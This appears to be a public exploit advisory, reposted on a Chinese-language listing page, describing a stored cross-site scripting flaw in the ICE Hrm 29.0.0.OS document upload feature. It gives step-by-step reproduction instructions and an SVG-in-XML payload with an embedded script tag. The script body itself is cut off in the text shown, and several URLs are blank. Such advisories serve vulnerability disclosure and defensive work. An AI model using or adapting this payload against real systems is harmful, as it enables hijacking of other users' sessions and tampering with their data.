ICE Hrm 29.0.0.OS – ‘xml upload’ Stored Cross-Site Scripting (XSS)

  • 作者: Piyush Patil
    日期: 2021-06-18
  • 类别:
  • 来源:
  • # Exploit Title: ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS)
    # Exploit Author: *Piyush Patil *& Rafal Lykowski
    # Vendor Homepage:
    # Version: 29.0.0.OS
    # Tested on: Windows 10 and Kali
    The file upload feature in ICE Hrm Version 29.0.0.OS allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability.
    #Steps to Reproduce the issue:
    1- Login to ICE Hrm Admin Panel
    2- Click on Employees=>Document Management=> Upload a below xml file
    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "">
    <svg version="1.1" baseProfile="full" xmlns="">
     <rect width="300" height="100"
    style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
     <script type="text/javascript">
    3- Visit the upload location of file and XSS will get triggered.
    #Video POC: